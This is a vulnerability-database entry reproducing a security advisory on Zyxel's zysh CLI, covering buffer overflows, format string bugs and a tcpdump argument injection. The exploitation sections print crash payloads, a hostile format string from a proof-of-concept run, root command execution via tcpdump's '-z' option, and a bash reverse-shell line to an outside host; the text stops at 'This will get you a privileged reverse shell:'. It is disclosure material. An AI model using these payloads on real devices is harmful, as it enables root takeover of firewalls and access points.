var-202205-1789
Vulnerability from variot

A argument injection vulnerability in the 'packet-trace' CLI command of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to execute arbitrary OS commands by including crafted arguments to the CLI command. --[ HNS-2022-02 - HN Security Advisory - https://security.humanativaspa.it/

  • Title: Multiple vulnerabilities in Zyxel zysh
  • Products: Zyxel firewalls, AP controllers, and APs
  • Author: Marco Ivaldi marco.ivaldi@hnsecurity.it
  • Date: 2022-06-07
  • CVE Names and Vendor CVSS Scores: CVE-2022-26531: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H (6.1) CVE-2022-26532: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)
  • Advisory URLs: https://github.com/hnsecurity/vulns/blob/main/HNS-2022-02-zyxel-zysh.txt https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml

--[ 0 - Table of contents

1 - Summary 2 - Background 3 - Vulnerabilities 4 - Analysis 4.1 - Buffer overflows in the "configure terminal > diagnostic" command 4.2 - Buffer overflow in the "debug" command 4.3 - Buffer overflow in the "ssh" command 4.4 - Format string bugs in the "extension" argument of some commands 4.5 - OS command injection in the "packet-trace" command 5 - Exploitation 5.1 - Buffer overflows 5.2 - Format string bugs 5.3 - OS command injection 6 - Affected products 7 - Remediation 8 - Disclosure timeline 9 - References

--[ 1 - Summary

"We live on a placid island of ignorance in the midst of black seas of infinity, and it was not meant that we should voyage far." -- H. P. Lovecraft, The Call of Cthulhu

We have identified multiple security vulnerabilities in the zysh binary that implements the command-line interface (CLI) on a wide range of Zyxel products, including their security appliances such as those in the Unified Security Gateway (USG) product line:

  • Multiple stack-based buffer overflows in the code responsible for handling diagnostic tests ("configure terminal > diagnostic" command).
  • A stack-based buffer overflow in the "debug" command.
  • A stack-based buffer overflow in the "ssh" command.
  • Multiple format string bugs in the "extension" argument of the "ping", "ping6", "traceroute", "traceroute6", "nslookup", and "nslookup6" commands.
  • An OS command injection vulnerability in the "packet-trace" command.

We demonstrated the possibility to exploit the format string bugs and the OS command injection vulnerability to escape the restricted shell environment and achieve arbitrary command execution on the underlying embedded Linux OS, respectively as regular user and as root.

--[ 2 - Background

The zysh binary is a restricted shell that implements the command-line interface (CLI) on multiple Zyxel [0] products. All regular user accounts have an /etc/passwd entry similar to the following:

admin:x:10007:10000:Administration account...:/etc/zyxel/ftp:/bin/zysh

Only the root user and the reserved debug account, disabled by default, have access to a proper bash shell:

root:x:0:0:root&admin&120&120&480&480&1&0:/root:/bin/bash ... debug:!:0:0:Debug Account:/root:/bin/bash

The Zyxel CLI can be accessed via SSH as follows:

raptor@blumenkraft ~ % ssh -l admin (admin@) Password: Router> # hello zysh!

On our Zyxel USG20-VPN test device, the CLI can also be accessed via Telnet (not enabled by default) or via the so-called Web Console, implemented with WebSockets, that is reachable with a web browser after authentication, at a URL such as the following:

https:///webconsole/

In the context of a wider audit of the security posture of Zyxel devices [1], we decided to audit zysh with the primary goal of escaping the restricted shell environment and executing arbitrary commands on the underlying embedded Linux OS. It is pretty large for a dynamically-linked, stripped binary (~19MB) and it makes plenty of unsafe API function calls, which makes it an interesting target.

--[ 3 - Vulnerabilities

During our audit of the zysh binary, we identified the following vulnerabilities:

  • Multiple stack-based buffer overflows in the code responsible for handling diagnostic tests ("configure terminal > diagnostic" command).
  • A stack-based buffer overflow in the "debug" command.
  • A stack-based buffer overflow in the "ssh" command.
  • Multiple format string bugs in the "extension" argument of the "ping", "ping6", "traceroute", "traceroute6", "nslookup", and "nslookup6" commands.
  • An OS command injection vulnerability in the "packet-trace" command.

All buffer overflows can be triggered only by admin users, while the format string bugs and the command injection vulnerability are exploitable by authenticated users of either admin or limited-admin type.

--[ 4 - Analysis

To follow along with our detailed vulnerability analysis, you can download the Zyxel Firmware 5.10 for "USG20-VPN - ABAQ - Non-Wireless Edition" (USG20-VPN_5.10.zip [2]). Extract the ZIP archive, then extract the password-protected ZIP archive 510ABAQ0C0.bin contained within, using the following password [1]:

4ulPPIs94jnYwUfwwoTqz/a5eRHFRwNYq8zFTrQZaE7XkoTgdzWc.6jea1v1zJb

Finally, extract the Squashfs filesystem image with binwalk or a similar tool, e.g.:

raptor@blumenkraft 510ABAQ0C0 % binwalk -e compress.img

The target binary we will reference throughout our analysys is /bin/zysh, available in the extracted filesystem:

raptor@blumenkraft bin % ls -l zysh -rwxr-xr-x 1 raptor staff 19727292 Sep 23 18:33 zysh* raptor@blumenkraft bin % shasum -a 256 zysh 47ee711a817e33bb2809e91d76b512498ae3cdca1276a2385f404384547404e3 zysh raptor@blumenkraft bin % file zysh zysh: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV), dynamically linked, interpreter /lib32/ld.so.1, for GNU/Linux 2.6.9, stripped

You can easily import it in your favorite disassembler. In Ghidra, we had to manually tweak the import options to reflect that the binary was compiled for the N32 ABI [3], importing it as "MIPS:BE:64:64-32addr:n32". The same requirement holds for any other binaries compiled for the Cavium Octeon III processor, on which our Zyxel USG20-VPN test device is based.

--[ 4.1 - Buffer overflows in the "configure terminal > diagnostic" command

The first buffer overflow vulnerability we identified is located in the function at 0x1013b238, which we dubbed do_emtap():

undefined8 do_emtap(longlong argc, char argv) { ... char acStack305[129]; ... else { uVar1 = 1; if (argc == 3) { sprintf(acStack305 + 1, "t%s.sh", argv[2]); / VULN #1 / pcVar4 = argv[1]; do_emtap_test(pcVar4, acStack305 + 1); do_emtap_test2(pcVar4, acStack305 + 1); report_test(); uVar1 = 0; } } return uVar1; }

This function is called when an admin user invokes the diagnostic test functionality in the Zyxel CLI with two arguments, e.g.:

Router> configure terminal Router(config)# diagnostic test

The buffer overflow happens due to the unsafe sprintf() call marked with the "VULN #1" comment above, which overflows past the boundary of the acStack305 array allocated on the stack with the contents of the argument.

Upon exploitation, however, the return statement at 0x1013b2f4 is never reached, because the overflow propagates to the other functions that are called by do_emtap(), which we dubbed do_emtap_test() and do_emtap_test2() in the pseudo-code above. More precisely, another overflow happens at the sprintf() call below marked as "VULN #2", located in the do_emtap_test() function at 0x1013a8f8. This overflow enables us to gain control over the pc register when do_emtap_test() returns:

int do_emtap_test(char test_name, char test_num) { ... char acStack320[128]; char acStack192[128]; ... sprintf(acStack320, "%s/%s", "/tmp/tap", test_name); / VULN #3 / mkdir(acStack320, 0x1c0); sprintf(acStack192, "%s/%s/%s", "/usr/local/emtap/test_script", test_name, test_num); / VULN #2 / iVar1 = access(acStack192, 0); if (iVar1 != 0) { return 1; } ... }

The unsafe sprintf() call overflows past the boundary of the acStack192 array. When do_emtap_test() returns, we are able hijack the control flow. However, we can only use numeric characters in our hostile buffer, therefore exploitation is extremely unlikely, if at all possible. The overflow can be triggered with the following payload:

Router> configure terminal Router(config)# diagnostic test anything 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 Program received signal SIGBUS, Bus error. 0x31313130 in ?? ()

A slightly better opportunity for exploitation is represented by another stack-based buffer overflow in the above function, marked with the "VULN

3" comment. This specific overflow can be triggered with the following

payload:

Router> configure terminal Router(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1 Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

This time, our hostile buffer can contain alphanumeric characters in the range [a-zA-Z0-9], plus the underscore '_'. Still far from ideal, but definitely better than the previously identified exploitation vector.

A similar vector is provided by yet another stack-based buffer overflow, this time in the function located at 0x1013ada0, which we dubbed do_emtap_test3():

undefined8 do_emtap_test3(char test_name) { ... char acStack288[127]; ... sprintf(acStack288, "%s %s/%s | %s -E \'t[0-9]+\.sh\' > %s", "/bin/ls", "/usr/local/emtap/test_script", test_name, "/bin/grep", "/tmp/tap/test_case_dir.tmp"); / VULN #4 */ system(acStack288); ... sprintf(acStack288, "%s %s", "/bin/rm", "/tmp/tap/test_case_dir.tmp"); system(acStack288); return 0; } ... }

This function is called when an admin user invokes the diagnostic test functionality in the Zyxel CLI with only one argument, e.g.:

Router> configure terminal Router(config)# diagnostic test

This time, the unsafe sprintf() call marked with the "VULN #4" comment overflows past the boundary of the acStack288 array. By exploiting this overflow, we can once again overwrite the pc register and hijack the control flow. In order to trigger this overflow, the following payload can be used:

Router> configure terminal Router(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /bin/ls: cannot access /usr/local/emtap/test_script/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

In the mentioned functions, including the one located at 0x1013aa10 that we dubbed do_emtap_test2() and that is not immediately reachable via the codepaths triggered by our hostile inputs, there are other instances of buffer overflow caused by the unchecked use of unsafe API functions, such as sprintf() and strcpy(). We have not deeply investigated their actual reachability, but they should be fixed as well. In addition, many unsafe programming constructs are present in the rest of the binary.

--[ 4.2 - Buffer overflow in the "debug" command

The buffer overflow vulnerability we identified in the code responsible for handling the "debug" command is located in the function at 0x1000df70, which we dubbed do_debug().

It is a pretty long function that gets called when an admin (or in some cases a limited-admin) user invokes the debug functionality in the Zyxel CLI, e.g.:

Router> debug

To trigger the overflow, the following payload can be used:

Router> debug gui webhelp redirect AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Router> debug gui show webhelp redirect Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

The first command writes a long string in the /tmp/webhelppath file:

int do_debug(ulonglong argc, char argv) { ... case 0x155: if (DAT_1145e55c != 0x150) { return 0; } pcVar11 = "/tmp/webhelppath"; if (DAT_1145e564 != 0x154) { return 0; } LAB_1000ebdc: pFVar12 = fopen64(pcVar11, "w"); / open file / ... fputs(argv[4], pFVar12); / write string to file / fclose(pFVar12); return 0; }

The second command triggers the overflow by reading from the /tmp/webhelppath file:

int do_debug(ulonglong argc, char argv) { ... undefined8 local_e0; ... if (lVar24 == 0x155) { pFVar12 = fopen64("/tmp/webhelppath", "r"); ... __isoc99_fscanf(pFVar12, "%s", &local_e0); / VULN #5 / fclose(pFVar12); fwrite(&DAT_1013fe18, 1, 9, stdout); puVar22 = &local_e0; pcVar11 = "Webhelp redirect: %s\n"; } LAB_1000f7d0: fprintf(stdout, pcVar11, puVar22); fwrite(&DAT_1013fe48, 1, 2, stdout); return 0; }

The vulnerability lies in the use of the unsafe __isoc99_fscanf() API function, which does not check if the destination string is large enough to accommodate the whole source string. This allows us to overwrite the saved return address and hijack the control flow. Our hostile buffer is limited to a length of 255 bytes and can contain only alphanumeric characters in the range [a-zA-Z0-9], plus the underscore '_', dash '-', and dot '.' special characters.

A similar bug can be triggered with the "debug gui kb redirect" and "debug gui show kb redirect" command combination. However, in this case, the destination buffer is too far away from the location where the return address is saved on the stack, therefore we cannot exploit this bug to control the pc register. We do not exclude other ways to exploit this vulnerability.

--[ 4.3 - Buffer overflow in the "ssh" command

The buffer overflow vulnerability we identified in the code responsible for handling the "ssh" command is located in the function at 0x10012298, which we dubbed do_ssh():

undefined8 do_ssh(int argc, char argv) { ... char acStack336[300]; ... sprintf(acStack336, "/usr/bin/ssh -o UserKnownHostsFile=/dev/null %s", argv[1]); / VULN #5 / ... sVar4 = strlen(acStack336); sprintf(acStack336 + sVar4, " -p %s", (undefined4 )((int)argv + iVar2)); / VULN #6 / ... }

You know the gist by now: there are two stack-based buffer overflows caused by the unchecked use of the unsafe API function sprintf(). To trigger the first overflow the following payload can be used, as an authenticated admin or limited-admin user:

Router> ssh AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is SHA256:fzNloEaOsmNQLHbhjroUVHkJC9ZTH09A6TRjyK+oiys. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1's password: [press enter a few times] Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

Once again, our hostile buffer can contain only alphanumeric characters, plus some special characters. As a side note, we noticed that we can inject arguments that get passed to the underlying /usr/bin/ssh command, albeit with some limitations:

Router> ssh -@127.0.0.1 unknown option -- @ usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-J [user@]host[:port]] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] destination [command]

Based on our analysis, this lack of input filtering is not exploitable to inject interesting command-line arguments (e.g. "-o ProxyCommand=..."):

Router> ssh -oProxyCommand@127.0.0.1 command-line: line 0: Bad configuration option: proxycommand@127.0.0.1 Router> ssh -oProxyCommand=@127.0.0.1 % (after 'ssh'): Parse error retval = -1 ERROR: Parse error/command not found!

--[ 4.4 - Format string bugs in the "extension" argument of some commands

Some zysh commands implement a special "extension" argument that allows to specify arbitrary command-line arguments to be passed to the invoked OS command that underlies each functionality:

Router> ping 127.0.0.1 ; count extension forever interface size source |

For instance, if we enter the following zysh command:

Router> ping 127.0.0.1 extension -c 1

The OS command line below will be executed via the function located at 0x101295d0, which we dubbed my_invoke():

$ /bin/zysudo.suid /bin/ping 1.1.1.1 -n -c 3 -c 1

As you can see, the additional arguments we specified after the "extension" keyword are appended to the OS command line.

We identified format string bugs in the following zysh commands:

  • "ping" and "ping6" commands, handled by the function at 0x1000c0a0, which we dubbed do_ping().
  • "traceroute" and "traceroute6" commands, handled by the function at 0x1000bc58, which we dubbed do_traceroute().
  • "nslookup" and "nslookup6" commands, handled by the function at 0x1000c718, which we dubbed do_nslookup().

The relevant pseudo-code snippets are:

undefined8 do_ping(int argc, char argv, char cmd) { ... if (iVar9 != 0) { sVar5 = strlen(acStack880); pcVar1 = ppcStack96[iVar9 + 1]; acStack880[sVar5] = ' '; acStack880[sVar5 + 1] = '\0'; strcpy(acStack880 + sVar5 + 1, pcVar1); / append extension args / } if (iVar8 == 0) { sprintf(acStack4976, acStack880); / VULN: format string bug */ __pid = fork(); ... }

undefined8 do_traceroute(int argc, char argv, char cmd) { ... if (iVar10 != 0) { sVar6 = strlen(acStack864); pcVar2 = argv[iVar10 + 1]; acStack864[sVar6] = ' '; acStack864[sVar6 + 1] = '\0'; strcpy(acStack864 + sVar6 + 1, pcVar2); / append extension args / } ... LAB_1000be10: sprintf(acStack4960,acStack864); / VULN: format string bug */ __pid = fork(); ... }

undefined8 do_nslookup(int argc, char argv) { ... pcVar4 = stpcpy((char )((int)&uStack832 + sVar3 + 1), (char )((int)argv + iVar2)); if (iVar8 != 0) { pcVar4[1] = '\0'; pcVar4 = ' '; strcpy(pcVar4 + 1, argv[iVar8 + 1]); / append extension args / } ... sprintf(acStack4928, (char )&uStack832); / VULN: format string bug / __pid = fork(); ... }

As a side note, in the "nslookup" and "nslookup6" commands there is also a bonus stack-based buffer overflow that is not large enough to reach the saved return address. It can be reproduced with the following payload:

Router> nslookup AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA extension AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGBUS, Bus error. 0x1000ba10 in _ftext () (gdb) x/i $pc => 0x1000ba10 <_ftext+17776>: lw v1,-10184(s0) (gdb) i r s0 s0: 0x4141414141414141

To reproduce the format string bugs and leak stack memory contents or crash zysh, instead, the following payloads can be used:

Router> # stack memory leak Router> ping 127.0.0.1 extension %x%x%x%x ping: unknown host 6eb83a7580808080fefeff001145e560 Router> # crash Router> ping 127.0.0.1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

2 0x77bfd980 in sprintf () from /lib32/libc.so.6

3 0x1000c38c in _ftext () << do_ping()

... Router> # crash Router> ping6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

Router> # crash Router> traceroute 127.0.0.1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

2 0x77bfd980 in sprintf () from /lib32/libc.so.6

3 0x1000be18 in _ftext () << do_traceroute()

... Router> # crash Router> traceroute6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

Router> # stack memory leak Router> nslookup 127.0.0.1 extension %x%x%x%x Using domain server: Name: 127.0.0.1 Address: 127.0.0.1#53 Aliases:

Host 0bd01390 not found: 3(NXDOMAIN) Router> # crash Router> nslookup 127.0.0.1 extension %n%n%n%n

Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6 (gdb) bt

0 0x77bf6768 in vfprintf () from /lib32/libc.so.6

1 0x77c14f44 in vsprintf () from /lib32/libc.so.6

2 0x77bfd980 in sprintf () from /lib32/libc.so.6

3 0x1000c8c0 in _ftext () << do_nslookup()

... Router> # crash Router> nslookup6 ::1 extension %n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x77bf6768 in vfprintf () from /lib32/libc.so.6

We just confirmed that we control the format strings passed as argument to the sprintf() API function in different locations of our target binary.

--[ 4.5 - OS command injection in the "packet-trace" command

The OS command injection we identified in the code responsible for handling the "packet-trace" command is located in the function at 0x10010258, which we dubbed do_packet-trace().

This function builds the command line for the /usr/sbin/tcpdump binary, based on the arguments with which the "packet-trace" command is invoked. The available arguments are:

Router# packet-trace ; dst-host duration extension-filter file interface ip-proto ipv6-proto port src-host |

The "extension-filter" argument is particularly interesting, because it allows to specify additional arbitrary command-line arguments to be passed to tcpdump. For instance, if we enter the following zysh command:

Router# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id

The OS command line below will be executed via the function located at 0x101295d0, which we dubbed my_invoke():

$ /usr/sbin/tcpdump -n -i eth0 -ln -i lo -w -a -W 1 -G 1 -z id

As you can see, we are using a variation of a well-known GTFOBins payload [4] that allows us to execute the following OS command (yes, command-line switches that begin with a '-' are accepted):

$ id -a

Refer to the manual page of tcpdump [5] for further details on how each command-line switch is interpreted. Seeing it all in action from the Web Console, as an authenticated admin or limited-admin user:

Router# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes Maximum file limit reached: 1 1 packet captured 2 packets received by filter 0 packets dropped by kernel uid=0(root) gid=0(root) groups=0(root)

We got arbitrary command execution as root! We just need to find a way to exploit it to escape the restricted shell environment.

--[ 5 - Exploitation

In the following sections, we will discuss exploitation of the identified vulnerabilities.

--[ 5.1 - Buffer overflows

The zysh binary is in a sorry state when it comes to modern countermeasures against exploitation of memory corruption bugs:

  • No RELRO
  • No stack canary
  • NX disabled
  • No PIE
  • Has RWX segments

That said, it looks like the buffer overflow vulnerabilities described in this advisory cannot be exploited to achieve arbitrary code execution after all, despite our gut feeling... In summary:

  • MIPS alphanumeric shellcode is not a thing [6].
  • A pure ROP chain is also not feasible, at least with the memory mapping used by the device and firmware version combination that we could test.

We can solve the first problem by storing our shellcode (along with a copious number of NOP-equivalent opcodes) in the value of the TERM environment variable that gets passed to the remote system via sshd (or in.telnetd). At this point, we still need to be able to overwrite the stored return address with a value that points to our NOP sled and shellcode payload, though. Unfortunately, a partial overwrite would not work in this case, because our target architecture is big endian and therefore we would only be able to overwrite the most significant byte(s), achieving nothing of note. On a device and firmware combination with a slightly different memory mapping, however, we might be able to pull this off and hijack the control flow.

We are not well-versed in the fine and obscure art of MIPS shellcoding and exploitation, so we might have missed something. Feel free to try this challenge on your own!

As a final note, we also looked into the possibility to exploit the many unsafe calls to system() present in the code in order to inject arbitrary OS commands. However, we could not slip past the pretty aggressive input filters implemented by zysh. Too bad.

--[ 5.2 - Format string bugs

As discussed earlier, we control the format strings passed as argument to the sprintf() API function in different locations of our target binary. As a proof of concept, this allowed us to leak stack memory contents and crash zysh.

It is now time to see if we are able to exploit the identified format string bugs to execute arbitrary code and escape the restricted shell environment... At first glance, this does not look feasible, because once again we are limited in the characters that we can use in our hostile buffer (alphanumeric characters plus some special characters in the 7-bit ASCII set).

However, we devised a workaround: instead of placing our retloc addresses at the beginning of the hostile format string as is customary, we can inject them in the process memory via the TERM environment variable! The direct parameter access feature of glibc, together with our very own format string exploitation technique for RISC architectures [7], will do the rest.

Long story short, we put together a proof-of-concept exploit [8] that does the following:

  • Authenticate and access the target zysh via SSH, injecting our payload (retloc sled + NOP sled + shellcode + padding) via the TERM environment variable.

  • Leak a stack address via the format string bug in the "ping" command, and use it to calculate the address of our injected shellcode near the bottom of the stack, which changes slightly at each zysh execution.

  • Craft another hostile format string to use as an argument to the "ping" command and overwrite the .got entry of fork(), which gets called right after the vulnerable sprintf(), with the shellcode address, using a variation of our write-one-byte-at-a-time technique designed for RISC architectures such as MIPS and SPARC.

  • Interact with the spawned bash shell!

We initially thought that Python/Paramiko would be a good language choice for the implementation, but we quickly changed our mind. In the end, we decided to go full old-school and developed our exploit in Tcl/Expect. Here it is in action:

raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp admin password raptor_zysh_fhtagn.exp - zysh format string PoC exploit Copyright (c) 2022 Marco Ivaldi raptor@0xdeadbeef.info

Leaked stack address: 0x7fe97170 Shellcode address: 0x7fe9de40 Base string length: 46 Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn

*** enjoy your shell! ***

sh-5.1$ uname -snrmp Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0 sh-5.1$ id uid=10007(admin) gid=10000(operator) groups=10000(operator)

Once we have access to a bash shell on the underlying embedded Linux OS, it should be pretty easy to escalate privileges to root, by leveraging local vulnerabilities [1].

It should not be too hard to automate/weaponize our exploit to make it work against other targets. This is left as an exercise.

In conclusion, format string bugs are a powerful exploit primitive, one of our favorites. Once again, they proved to be up to the task even in a constrained scenario such as the one we described.

--[ 5.3 - OS command injection

We managed to find a way to execute arbitrary OS commands by injecting specially-crafted arguments into the tcpdump command line. However, exploitation of this vulnerability to escape the restricted shell environment is not straightforward, due to a number of constraints:

  • We can only execute OS commands that do something useful to reach our goal when invoked with exactly one command-line argument.

  • Executing "bash -i" (or similar commands such as gdb and python) directly does not work, because the shell would die with a "Bad file descriptor" error or similar.

  • We could upload a shellcode binary via the FTP service (enabled by default on our test device) in the /etc/zyxel/ftp/tmp directory, but to be able to execute it we would need to find a way to turn the file's executable bit on; we might also be able to abuse some zysh functionality to create an executable file in /etc/zyxel/ftp/tmp that we can later overwrite via FTP or some other means that keep the executable bit on, but we could not find an immediate way to do this.

  • We even crafted plain-text traffic to inject arbitrary commands into the pcap output file saved by tcpdump, and tried executing this file as a bash script, but bash would refuse to run it ("cannot execute binary file").

  • Alternatively, we could directly upload a shell script via FTP and run it as an argument to bash, but before its execution it would get overwritten by tcpdump; in theory, we could try winning a race by continuously uploading the shell script while tcpdump is executing. Luckily, before we had to implement this, we found a better way.

We were indeed lucky in finding almost by accident the reliable way to exploit this vulnerability that we are going to describe, which involves the use of standard output as a tcpdump output file ("-w -" command-line option) and some eldritch file descriptor trickery.

In order to escape the restricted shell environment and execute arbitrary commands as root on the underlying embedded Linux OS, first authenticate to the Web Console at https:///webconsole/ as either an admin or limited-admin user. Then, run the following commands:

Router# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z python tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes ... Maximum file limit reached: 1 5 packets captured 10 packets received by filter 0 packets dropped by kernel Router# Python 2.7.14 (default, Sep 23 2021, 23:30:37) [GCC 4.7.0] on linux2 Type "help", "copyright", "credits" or "license" for more information.

[press enter a few times] Router# Router# Router# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z bash tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes ... Maximum file limit reached: 1 5 packets captured 10 packets received by filter 0 packets dropped by kernel Router# # [press enter again] File "", line 1 ^ SyntaxError: invalid syntax import os os.system("bash -i >& /dev/tcp//23234 0>&1")

This will get you a privileged reverse shell:

